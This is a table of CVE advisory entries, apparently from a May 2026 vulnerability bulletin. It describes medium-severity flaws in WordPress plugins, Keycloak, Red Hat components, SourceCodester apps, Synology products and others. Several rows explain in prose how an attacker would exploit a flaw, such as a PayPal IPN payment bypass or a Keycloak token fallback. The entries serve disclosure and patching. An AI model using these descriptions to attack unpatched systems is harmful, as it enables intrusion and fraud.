| rankmath--Rank Math SEO AI SEO Tools to Dominate SEO Rankings | The Rank Math SEO - AI SEO Tools to Dominate SEO Rankings plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the update_site_editor_homepage function in all versions up to, and including, 1.0.271. This makes it possible for unauthenticated attackers to modify several plugin settings including homepage title, meta description, breadcrumbs label, and social media metadata, which can have severe impact on SEO rankings and display malicious content across all site pages where breadcrumbs are used. | 2026-05-29 | 5.3 | CVE-2025-12714 |
| rchmura--GoStats for WordPress | The GoStats for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the gostats_manage() function. This makes it possible for unauthenticated attackers to update the plugin's settings (gostats_siteid and gostats_server options) via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 4.3 | CVE-2026-8943 |
| realmag777--FOX Currency Switcher Professional for WooCommerce | The FOX - Currency Switcher Professional for WooCommerce plugin for WordPress is vulnerable to Authorization Bypass Through User-Controlled Key in all versions up to and including 1.4.6. This is due to the `get_value()` function in `classes/fixed/fixed_user_role.php` trusting the attacker-controlled `$_REQUEST['wooc_order_user_roles']` parameter to determine the user's role context for role-based price resolution without any validation, allowing it to override the legitimate role data derived from the authenticated user's session object via `$user->roles`. This makes it possible for authenticated attackers, with Subscriber-level access and above, to impersonate higher-privileged roles - such as wholesale customer or administrator - and obtain discounted or otherwise restricted pricing that should not be available to their actual role. This vulnerability only has practical impact when the fixed user-role pricing feature is enabled and at least one product has a privileged-role price configured. | 2026-05-28 | 4.3 | CVE-2026-9241 |
| Recorp--Export WP Page to Static HTML/CSS | Cross-Site Request Forgery (CSRF) vulnerability in Recorp Export WP Page to Static HTML/CSS allows Cross Site Request Forgery. This issue affects Export WP Page to Static HTML/CSS: from n/a through 6.0.0. | 2026-05-25 | 6.5 | CVE-2026-24574 |
| Red Hat--Multicluster Engine for Kubernetes | ACM/MCE assisted-service writes raw referenced pull-secret contents into `InfraEnv.status.conditions[].message` when pull-secret validation fails. A namespace principal with the stock `view` ClusterRole cannot directly read Secrets, but can read `InfraEnv` objects and recover the referenced Secret's `.dockerconfigjson` data from status. This bypasses the Kubernetes/OpenShift RBAC separation between read-only namespace viewers and Secret readers. In the reproduced proof, the same ServiceAccount was denied `get` and `list` on Secrets, but recovered synthetic pull-secret `username`, `password`, `email`, and base64 `auth` fields through `InfraEnv.status`. | 2026-05-29 | 6.3 | CVE-2026-10101 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. An authenticated user with low privileges can exploit this vulnerability by sending an oversized subject_token JSON Web Token (JWT) to the TokenEndpoint. When the token exceeds a 4000-character limit, it is silently dropped, causing the system to fall back to client credentials. This allows the user to gain the permissions of the client's service account, leading to privilege escalation. | 2026-05-27 | 6.8 | CVE-2026-9704 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak's Client Policies, specifically within the `org.keycloak.protocol.oidc` component. When certain condition providers (client-type, client-roles, client-attributes, client-scopes) are used to enforce security restrictions, the `reject-ropc-grant` executor is silently bypassed. This allows an unauthenticated remote attacker to obtain tokens via a Resource Owner Password Credentials (ROPC) grant, even when a policy is explicitly configured to block it. This bypass can lead to unauthorized access and information disclosure. | 2026-05-28 | 6.5 | CVE-2026-9792 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. An authenticated administrator with the `manage-clients` role can exploit a Time-of-check to time-of-use (TOCTOU) vulnerability in the name-based admin role checks. This allows the attacker to escalate their privileges to `realm-admin` for all users within the realm, granting them extensive control over the system. The composite role relationship persists even after the attacker's own permissions are revoked and across system reboots. | 2026-05-28 | 6.5 | CVE-2026-9796 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. When revokeRefreshToken=true is enabled and persistent session storage is in use, a server restart can reset internal timing mechanisms. This allows a remote attacker, who has previously captured a user's refresh token, to replay that token even after it has been revoked. Successful exploitation grants the attacker unauthorized access to the victim's account, potentially leading to information disclosure or privilege escalation. | 2026-05-28 | 6.8 | CVE-2026-9802 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. When a JSON Web Encryption (JWE) encrypted request object is submitted, Keycloak may incorrectly process unsigned claims if the decrypted content is raw JSON, bypassing the configured signature policy. This allows a remote attacker to submit unauthorized claims, leading to a compromise of data integrity within the OpenID Connect (OIDC) authorization flow. While a redirect URI allowlist acts as a compensating control, this vulnerability violates OIDC Core and Financial-grade API (FAPI) signing requirements. | 2026-05-28 | 5.9 | CVE-2026-9793 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. A remote, unauthenticated attacker can exploit this vulnerability by sending specially crafted SOAP requests to the SAML ECP (Security Assertion Markup Language Enhanced Client or Proxy) endpoint with varying client IDs. By observing distinct faultstrings in the responses, the attacker can determine the client's protocol type, leading to information disclosure. | 2026-05-28 | 5.3 | CVE-2026-9794 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak's ClientRegistrationAuth component. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted POST request with a malformed 'Authorization: Bearer' header to any client registration endpoint. This can lead to an ArrayIndexOutOfBoundsException, causing the server to return an HTTP 500 error and resulting in a Denial of Service (DoS) for the affected service. | 2026-05-28 | 5.3 | CVE-2026-9803 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak, an open-source identity and access management solution. When a client application is configured to accept broad redirect Uniform Resource Identifiers (URIs), a remote attacker can manipulate the authentication process by crafting a special web address. If a user clicks this link, the client application might incorrectly prioritize attacker-controlled information over legitimate data. This vulnerability, known as HTTP parameter pollution, could allow an attacker to bypass security measures or gain unauthorized access to resources. | 2026-05-27 | 4.2 | CVE-2026-9689 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. An authenticated user with existing organization membership can exploit this flaw by accessing user-facing APIs, such as the account API or by requesting an OpenID Connect (OIDC) token with the 'organization' scope. This allows organization metadata to be disclosed in tokens, even after an administrator has explicitly disabled the Organizations feature, potentially leading to incorrect authorization decisions by resource servers. | 2026-05-28 | 4.3 | CVE-2026-9791 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak, an open-source identity and access management solution. When a user account is temporarily locked due to repeated failed login attempts, an attacker with valid client credentials can exploit the Client-Initiated Backchannel Authentication (CIBA) flow to bypass this brute-force protection. This allows continued authentication attempts and token issuance even when the account should be locked, potentially enabling further unauthorized access attempts. | 2026-05-28 | 4.3 | CVE-2026-9798 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. A remote attacker with high privileges, such as a realm administrator configuring a malicious Lightweight Directory Access Protocol (LDAP) server or an attacker compromising an upstream LDAP server, could exploit this vulnerability. By sending a malformed LDAP password policy response during a password authentication request, the attacker can trigger an OutOfMemoryError. This causes the Keycloak Java Virtual Machine (JVM) to terminate, leading to a denial of service (DoS) for all realms on the affected node. | 2026-05-28 | 4.9 | CVE-2026-9801 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in Samba's vfs_worm module. The module is intended to provide write-once, read-many (WORM) protections by preventing modification of files after a configurable grace period. Due to insufficient validation during rename operations, an authenticated user with write access to a share could overwrite a protected file by renaming a newly created file over the existing WORM-protected file. | 2026-05-27 | 6.5 | CVE-2026-2340 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in glib-networking. A remote attacker can exploit this vulnerability by presenting a specially crafted certificate chain to an application that uses glib-networking with the GnuTLS backend enabled and performs certificate verification. This crafted chain, which contains circular issuer relationships, can cause an infinite loop during certificate verification. The unbounded traversal consumes excessive CPU resources, leading to a denial of service for the affected process or worker. | 2026-05-28 | 4.3 | CVE-2026-10028 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libsoup. A remote attacker could exploit an unsigned to signed conversion error in the `soup_body_input_stream_read_chunked()` function by sending a malicious HTTP request. This vulnerability occurs when libsoup operates behind a non-libsoup proxy server or as a proxy in front of a non-libsoup backend server. Successful exploitation can allow an attacker to bypass security controls, poison web caches, or gain unauthorized access. | 2026-05-29 | 4.8 | CVE-2026-6324 |
| Red Hat--Red Hat Enterprise Linux 8 | A flaw was found in gnutls. An off-by-one error exists in the PKCS#12 bag element bounds check. This vulnerability allows a remote attacker to write past the internal array of a PKCS#12 bag when appending to a bag that already contains 32 elements. This memory corruption could lead to a denial of service (DoS) or potentially other unspecified impacts. | 2026-05-26 | 5.3 | CVE-2026-42015 |
| Red Hat--Red Hat Quay 3 | A flaw was found in the Quay config-tool's LDAP and SMTP validation functions. An attacker with config editor access can exploit these functions, which make outbound connections to user-supplied endpoints without proper IP or host filtering. This allows the attacker to perform internal network reconnaissance from the Quay pod's network position, potentially mapping the internal network infrastructure. | 2026-05-29 | 4.1 | CVE-2026-10052 |
| rexxars--eventsource-encoder | eventsource-encoder encodes events as well-formed EventSource/Server Sent Event (SSE) messages. Prior to 1.0.2, eventsource-encoder does not sanitize the event or id fields of an EventSourceMessage before serializing them. An attacker who controls either field can inject arbitrary Server-Sent Events line terminators (\n, \r, or \r\n) and thereby forge additional SSE fields or entire messages on the stream. This vulnerability is fixed in 1.0.2. | 2026-05-26 | 5.8 | CVE-2026-44214 |
| Roundcube--Webmail | In Roundcube Webmail 1.6.x between 1.6.14 and 1.6.16 and 1.7.x before 1.7.1, remote image blocking was not honored for URLs pointing to local/private destinations, which may lead to information disclosure or privilege escalation via a text/html email message. | 2026-05-25 | 6.5 | CVE-2026-48845 |
| Roundcube--Webmail | In Roundcube Webmail 1.6.x before 1.6.16 and 1.7.x before 1.7.1, the remote image blocking feature can be bypassed via a crafted CSS var() value in an e-mail message, which may lead to information disclosure or access-control bypass. | 2026-05-25 | 6.5 | CVE-2026-48846 |
| Roundcube--Webmail | In Roundcube Webmail 1.6.x before 1.6.16 and 1.7.x before 1.7.1, an unsanitized subject field in the draft restored value could lead to stored XSS/HTML/CSS injection on shared mailboxes. | 2026-05-25 | 4.4 | CVE-2026-48849 |
| Ruben Garcia--GamiPress | Missing Authorization vulnerability in Ruben Garcia GamiPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects GamiPress: from n/a through 7.6.3. | 2026-05-25 | 5.3 | CVE-2026-24546 |
| ruchit47--Events In City | The Events In City plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'org-events' shortcode in versions up to, and including, 3.0. This is due to insufficient input sanitization and output escaping on user supplied attributes (such as 'organizer_id', 'width', 'height', 'transparency', 'header', 'border', and 'layout') in the org_event_scode() function. The attribute values are concatenated directly into HTML attributes without esc_attr(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8898 |
| saadiqbal--Post Snippets Custom WordPress Code Snippets Customizer | The Post Snippets plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 4.0.19. This is due to insufficient output escaping of imported snippet content when rendering JavaScript variables in the post editor. Specifically, the `jqueryUiDialog()` method in `WPEditor.php` embeds snippet content directly into JavaScript string literals without escaping double quotes (the quote-escaping code on line 214 is commented out). When snippets are imported via the Import/Export feature, the content bypasses WordPress's `wp_magic_quotes()` (which would otherwise add protective backslashes), allowing double quotes in snippet content to break out of the JavaScript string context. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts via a malicious import file that execute whenever any administrator accesses a post editor page. Please note that this does not affect single-site installations as administrators already have the `unfiltered_html` capability. | 2026-05-29 | 4.4 | CVE-2026-7430 |
| safedep--gryph | Gryph provides a security layer for AI coding agents. Prior to 0.7.0, Gryph implements logging levels that determine what content is logged to a local sqlite database. The README incorrectly mentions that the default log level is minimal while it is standard. Source code review shows sensitive file-write content remains in the stored payload as ContentPreview, OldString, or NewString at the default standard logging level and at full. This leads to logging of potentially sensitive file content in the local sqlite database, violating Gryph's sensitive file filter and log level contracts. This vulnerability is fixed in 0.7.0. | 2026-05-27 | 5.5 | CVE-2026-45046 |
| samiullah-kaifi--Islamic Database | The Islamic Database plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'islamicDB-roqya' shortcode in versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on user-supplied 'width' and 'height' shortcode attributes within the islamicDB_sc_quran_qari_roqya() function, which are concatenated directly into HTML iframe attribute values. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8845 |
| SAP_SE--SAP Gateway | The SAP Gateway allows attackers to inject content into error messages, potentially leading to disclosure of request artefacts (e.g., regex patterns) and revealing underlying URI parsing logic. This leads to a low impact on confidentiality; integrity and availability are unaffected. | 2026-05-26 | 4.3 | CVE-2026-44749 |
| ScadaBR--ScadaBR | A reflected cross-site scripting issue exists in URL handling. | 2026-05-28 | 6.1 | CVE-2026-9646 |
| scanwith--Visual Ping | Visual Ping 0.8.0.0 contains a buffer overflow vulnerability in input field handling that allows local attackers to crash the application by supplying oversized data. Attackers can inject malicious payloads exceeding 4108 bytes into the Host, Time Out, Packet Size, Pause, or Loops fields to trigger a denial of service condition. | 2026-05-25 | 6.2 | CVE-2018-25369 |
| scottpaterson--Contact Form 7 PayPal & Stripe Add-on | The Contact Form 7 - PayPal & Stripe Add-on plugin for WordPress is vulnerable to Payment Bypass via Insufficient Verification of Data Authenticity in all versions up to, and including, 2.4.9. Although `cf7pp_paypal_ipn_handler()` correctly validates IPN authenticity by posting back to PayPal with `cmd=_notify-validate`, it fails to compare the IPN payload's `mc_gross` (payment amount), `mc_currency`, or `receiver_email` fields against the corresponding stored order values before passing the attacker-controlled `invoice` field directly to `cf7pp_complete_payment()`, which marks the order completed after only an integer cast with no amount verification. This makes it possible for unauthenticated attackers to mark arbitrary high-value pending orders as fully paid by making a minimal real PayPal payment and crafting an IPN whose `invoice` parameter references the targeted order, effectively completing purchases without tendering the required payment amount. | 2026-05-29 | 5.3 | CVE-2026-9189 |
| SePay team--SePay Gateway | Missing Authorization vulnerability in SePay team SePay Gateway allows Retrieve Embedded Sensitive Data. This issue affects SePay Gateway: from n/a through 1.1.20. | 2026-05-25 | 6.5 | CVE-2026-42763 |
| shabti--Frontend Admin by DynamiApps | The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to generic SQL Injection via the 'order' parameter in all versions up to, and including, 3.28.28 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Exploitation requires that the attacker also supply a valid 'orderby' parameter in the same request, as this is necessary to reach the vulnerable code path that processes and concatenates the 'order' value into the SQL query. | 2026-05-29 | 4.9 | CVE-2026-10039 |
| shopperlabs--shopper | Shopper is a Headless e-commerce Admin Panel. Prior to 2.8.0, Sub-form Livewire components used in the product editor (Edit, Inventory, Seo, Shipping, Files) had no authorization on their store() method. Any authenticated panel user, regardless of role, could mutate any product's pricing, stock, SEO metadata, shipping dimensions, and attached media without holding edit_products. The affected components accepted the product ID as a public Livewire property without #[Locked], so an attacker could also target an arbitrary product by tampering with the wire payload from the client. This vulnerability is fixed in 2.8.0. | 2026-05-29 | 6.5 | CVE-2026-47742 |
| shopperlabs--shopper | Shopper is a Headless e-commerce Admin Panel. Prior to 2.8.0, the admin tables for PaymentMethods, Currencies and Carriers exposed inline toggles and per-record actions (enable, disable, edit, delete) that were rendered for any authenticated panel user without checking the corresponding per-action permission. A low-privilege user could disable every payment method on the store, disable or alter the default currency, or disable carriers. The impact is a full denial of checkout and pricing integrity loss, reachable by any authenticated user. This vulnerability is fixed in 2.8.0. | 2026-05-29 | 6.5 | CVE-2026-47745 |
| shopperlabs--shopper | Shopper is a Headless e-commerce Admin Panel. Prior to 2.8.0, CreateOrderFromCartAction::execute previously created the Order row before checking and incrementing the discount's total_use counter. Under concurrent checkout pressure (Black Friday, flash sale, viral coupon), the global usage_limit was silently exceeded: orders were committed with the discount fully applied to price_amount while the counter blocked at usage_limit. The merchant had no signal that an over-redemption had occurred. This vulnerability is fixed in 2.8.0. | 2026-05-29 | 5.9 | CVE-2026-47741 |
| shra--Genzel breadcrumbs | The Genzel breadcrumbs plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on the _options_page function. This makes it possible for unauthenticated attackers to update the plugin's breadcrumb configuration, including templates, delimiter, home label, home URI, and breadcrumb rules via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 4.3 | CVE-2026-8708 |
| Significant-Gravitas--AutoGPT | AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. Prior to 0.6.59, POST /api/blocks/{block_id}/execute endpoint executes blocks without consuming any credits, regardless of the user's balance. The credit check that exists in the graph execution path (manager.py) is never reached when blocks are called directly via the external API, allowing unlimited free execution of all blocks. This vulnerability is fixed in 0.6.59. | 2026-05-28 | 5.4 | CVE-2026-45023 |
| silvercover--myLinksDump | The myLinksDump plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link_title' parameter in all versions up to, and including, 1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-05-27 | 4.8 | CVE-2026-2288 |
| simonailie--Search Simple Fields | The Search Simple Fields plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 0.2. This is due to missing or incorrect nonce validation on the search_simple_fields_options() function in functions_admin.php. This makes it possible for unauthenticated attackers to modify the plugin's settings - including post types to search in, custom fields, media fields and the custom media function name - via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 4.3 | CVE-2026-8939 |
| Sitejo--HaPe PKH | HaPe PKH 1.1 contains a cross-site request forgery vulnerability that allows attackers to change administrator passwords by submitting forged requests to the user update endpoint. Attackers can craft malicious forms targeting the aksi_user.php script with parameters like id_user, password, and level to modify admin credentials without authentication. | 2026-05-29 | 5.3 | CVE-2018-25387 |
| smtp2go--SMTP2GO for WordPress Email Made Easy | The SMTP2GO for WordPress - Email Made Easy plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 1.16.0. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to truncate all SMTP2GO log records from the database or download a CSV export of all SMTP log data including recipient addresses, sender addresses, message subjects, and API response data. | 2026-05-28 | 4.3 | CVE-2026-7621 |
| smub--Easy Digital Downloads eCommerce Payments and Subscriptions made easy | The Easy Digital Downloads plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.7. This is due to missing nonce verification in the `handle_oauth_redirect()` function, which is registered on the `admin_init` hook and processes Square OAuth tokens from a user-supplied GET parameter without any CSRF token validation. This makes it possible for unauthenticated attackers to overwrite the store's Square payment gateway credentials by tricking a logged-in administrator into clicking a crafted link, potentially resulting in payment account hijacking. | 2026-05-28 | 4.3 | CVE-2026-7533 |
| smub--PDF Embedder | The PDF Embedder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.9.3 via the enqueue_block_assets. This makes it possible for authenticated attackers, with contributor-level access and above, to extract configuration data. License key exposure occurs when the premium add-on is also installed and has saved a key; on Lite-only installations, the exposed data is limited to non-sensitive viewer configuration values such as width, height, toolbar settings, usage tracking, and plan. | 2026-05-28 | 4.3 | CVE-2026-7526 |
| Soroush--Soroush IM Desktop App | Soroush IM Desktop App 0.17.0 contains an authentication bypass vulnerability that allows local attackers to remove passcodes by injecting pre-encrypted database entries using a constant encryption key. Attackers can inject malicious database records into the application's database files to unlock the client and access all stored data, chats, images, and files without knowing the original passcode. | 2026-05-25 | 6.8 | CVE-2018-25361 |
| SourceCodester--CET Automated Grading System with AI Predictive Analytics | A security flaw has been discovered in SourceCodester CET Automated Grading System with AI Predictive Analytics 1.0. This affects an unknown function. Performing a manipulation results in cross-site request forgery. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-26 | 4.3 | CVE-2026-9582 |
| SourceCodester--CET Automated Grading System with AI Predictive Analytics | A weakness has been identified in SourceCodester CET Automated Grading System with AI Predictive Analytics 1.0. This impacts an unknown function of the file /index.php of the component SQL Handler. Executing a manipulation can lead to information exposure through error message. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. | 2026-05-26 | 4.3 | CVE-2026-9583 |
| SourceCodester--eDoc Doctor Appointment System | A security vulnerability has been detected in SourceCodester eDoc Doctor Appointment System 1.0. This affects an unknown part of the file /admin/delete-session.php. The manipulation of the argument ID leads to missing authorization. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. | 2026-05-26 | 6.5 | CVE-2026-9603 |
| SourceCodester--Indian Invoicing System | A vulnerability was found in SourceCodester Indian Invoicing System 1.0. This issue affects some unknown processing of the file /Invoicing/IGST_Invoice.php of the component Invoice Generation Handler. Performing a manipulation of the argument customer_name/category results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. | 2026-05-25 | 6.3 | CVE-2026-9411 |
| SourceCodester--Indian Invoicing System | A vulnerability was determined in SourceCodester Indian Invoicing System 1.0. Impacted is an unknown function of the component Backend Endpoint. Executing a manipulation can lead to improper access controls. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. Multiple endpoints are affected. | 2026-05-25 | 6.3 | CVE-2026-9412 |
| SourceCodester--Indian Invoicing System | A vulnerability was identified in SourceCodester Indian Invoicing System 1.0. The affected element is an unknown function of the file /Invoicing/category.php. The manipulation of the argument msg leads to cross site scripting. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2026-05-25 | 4.3 | CVE-2026-9413 |
| SourceCodester--Simple POS and Inventory System | A flaw has been found in SourceCodester Simple POS and Inventory System 1.0. Impacted is an unknown function of the file /admin/addproduct.php of the component File Extension Handler. This manipulation of the argument image causes unrestricted upload. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2026-05-25 | 6.3 | CVE-2026-9445 |
| SourceCodester--Simple POS and Inventory System | A vulnerability was detected in SourceCodester Simple POS and Inventory System 1.0. This issue affects the function delete of the file /admin/deleteproduct.php of the component GET Parameter Handler. The manipulation of the argument ID results in sql injection. The attack may be launched remotely. The exploit is now public and may be used. | 2026-05-25 | 4.7 | CVE-2026-9444 |
| SourceCodester--Simple POS and Inventory System | A vulnerability has been found in SourceCodester Simple POS and Inventory System 1.0. The affected element is an unknown function of the file /admin/edit_customer.php. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2026-05-25 | 4.7 | CVE-2026-9446 |
| SourceCodester--Student Grades Management System | A vulnerability was found in SourceCodester Student Grades Management System 1.0. Affected is an unknown function of the file grades.php. Performing a manipulation of the argument student_id results in improper authorization. The attack may be initiated remotely. The exploit has been made public and could be used. | 2026-05-25 | 6.3 | CVE-2026-9483 |
| SourceCodester--Student Grades Management System | A vulnerability was determined in SourceCodester Student Grades Management System 1.0. Affected by this vulnerability is the function getClassroomStudents/removeStudentFromClassroom of the file classroom.php. Executing a manipulation of the argument classroom_id can lead to improper authorization. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-25 | 6.3 | CVE-2026-9484 |
| SourceCodester--Student Grades Management System | A security flaw has been discovered in SourceCodester Student Grades Management System 1.0. This affects an unknown part. The manipulation results in cross-site request forgery. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-25 | 4.3 | CVE-2026-9486 |
| SpabRice--Nyla | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in SpabRice Nyla allows Code Injection. This issue affects Nyla: from n/a through 1.7. | 2026-05-26 | 5.3 | CVE-2026-39642 |
| Spring--Spring AI | Spring AI's support for Anthropic's Skills API used LLM-influenced filenames unsanitized in Path.resolve before writing files to disk. This could allow a malicious user to write files outside the intended target directory, including restricted directories. Affected versions: Spring AI: 1.1.0 through 1.1.x | 2026-05-25 | 6.5 | CVE-2026-41863 |
| Squirrel--Squirrel | A security flaw has been discovered in Squirrel up to 3.2. Impacted is the function ReadObject of the file squirrel/sqobject.cpp of the component Cnut File Handler. Performing a manipulation results in heap-based buffer overflow. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-26 | 5.3 | CVE-2026-9541 |
| statamic--cms | Statamic is a Laravel and Git powered content management system (CMS). Prior to 5.73.22 and 6.18.1, the Glide image proxy's URL validation could be bypassed using an IP representation that wasn't normalized before the public-IP check. An unauthenticated user could cause the server to make HTTP requests to internal addresses - including loopback, private network, and cloud metadata endpoints. This affects sites that pass user-supplied URLs to Glide. Sites running PHP 8.3 or newer are not affected. This vulnerability is fixed in 5.73.22 and 6.18.1. | 2026-05-29 | 5.4 | CVE-2026-45660 |
| statcounter--StatCounter Free Real Time Visitor Stats | The StatCounter - Free Real Time Visitor Stats plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.1.1. This is due to insufficient output escaping on the post author's nickname in the statcounter_addToTags() function. The function is hooked to wp_head and fires on every single post page. It retrieves the post author's nickname via the_author_meta() and echoes it directly into a JavaScript double-quoted string context inside a <script> block without applying esc_js() or any equivalent JavaScript-context escaping. This makes it possible for authenticated attackers with Author-level access and above to inject arbitrary web scripts into pages that will execute whenever any user (including unauthenticated visitors) accesses a post authored by the attacker. | 2026-05-29 | 6.4 | CVE-2026-6275 |
| Stokedonit--Notebook Pro | Notebook Pro 2.0 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the notebook name field. Attackers can create a malicious text file containing 500 or more characters, paste the content into the New Notebook Name field, and trigger an application crash when attempting to create and save the notebook. | 2026-05-25 | 6.2 | CVE-2018-25378 |
| stonith404--pingvin-share | A security flaw has been discovered in stonith404 pingvin-share up to 1.13.0. This affects the function getServerSideProps of the file frontend/src/pages/auth/signIn.tsx of the component Sign-in Auto-Redirect. The manipulation of the argument redirect results in cross site scripting. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-26 | 4.3 | CVE-2026-9519 |
| Strategy11 Team--AWP Classifieds | Missing Authorization vulnerability in Strategy11 Team AWP Classifieds (another-wordpress-classifieds-plugin) allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects AWP Classifieds: from n/a through 4.4.5. | 2026-05-27 | 6.5 | CVE-2026-42726 |
| streamlink--streamlink | Streamlink is a CLI utility which pipes video streams from various services into a video player. Prior to 8.4.0, Streamlink's HLS and DASH parsers do not validate the URI scheme of segment entries and other resources. A remote .m3u8 HLS playlist or .mpd DASH manifest can list file:///path/to/file as a segment, and streamlink will read that local file and write its contents to the output stream. This vulnerability is fixed in 8.4.0. | 2026-05-27 | 6.5 | CVE-2026-44353 |
| Sushmi-pal--Invoice-System | A flaw has been found in Sushmi-pal Invoice-System up to a0a3faa16dee2621b231ae227333f5761607283b. This affects an unknown part of the file /user of the component User Management Handler. This manipulation of the argument role causes improper authorization. It is possible to initiate the attack remotely. The exploit has been published and may be used. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 4.3 | CVE-2026-9409 |
| Sushmi-pal--Invoice-System | A vulnerability has been found in Sushmi-pal Invoice-System up to a0a3faa16dee2621b231ae227333f5761607283b. This vulnerability affects unknown code of the file /profile of the component Profile Workflow. Such manipulation of the argument ID leads to improper authorization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continuous delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 4.3 | CVE-2026-9410 |
| Synology--ActiveProtect Agent | Origin validation error vulnerability in Synology ActiveProtect Agent before 1.1.0-0439 allows local users to write arbitrary files with restricted content when installing. | 2026-05-27 | 6.1 | CVE-2025-13593 |
| Synology--BeeDrive for desktop | Files or directories accessible to external parties vulnerability in redis-server component in Synology BeeDrive for desktop before 1.3.2-13814 allows local users to conduct denial-of-service attacks via unspecified vectors. | 2026-05-27 | 6.8 | CVE-2024-11399 |
| Synology--Safe Access | Improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability in Safe Access in Synology Safe Access before 1.3.1-0329 allows remote authenticated users with administrator privileges to read or write specific files containing non-sensitive information or conduct limited denial-of-service in SRM. | 2026-05-27 | 5.9 | CVE-2025-10466 |
| Synology--Storage Manager | A use of get request method with sensitive query strings vulnerability in volume encryption of Synology Storage Manager package before 1.0.1-1100 allows local attackers to obtain sensitive information. | 2026-05-27 | 6.2 | CVE-2026-2237 |
| Synology--Surveillance Station | Missing authorization vulnerability in AddOns functionality in Synology Surveillance Station before 9.2.2-11575 and 9.2.2-9575 allows remote authenticated users with administrator privileges to obtain sensitive information via unspecified vectors. | 2026-05-27 | 4.9 | CVE-2024-47268 |
| Synology--Surveillance Station | Cleartext transmission of sensitive information vulnerability in Export Key functionality in Synology Surveillance Station before 9.2.2-11575 and 9.2.2-9575 allows remote authenticated users with administrator privileges to obtain sensitive information via unspecified vectors. | 2026-05-27 | 4.9 | CVE-2024-47269 |
| Synology--Surveillance Station | Insufficiently protected credentials vulnerability in IPSpeaker component in Synology Surveillance Station before 9.2.2-11575 and 9.2.2-9575 allows remote authenticated users with administrator privileges to obtain sensitive information via unspecified vectors. | 2026-05-27 | 4.9 | CVE-2024-47271 |
| Synology--Synology Active Backup for Business Agent | An origin validation error vulnerability in Synology Active Backup for Business Agent before 3.1.0-4967 allows local users to write arbitrary files with restricted content during installation. | 2026-05-27 | 6.1 | CVE-2025-66592 |
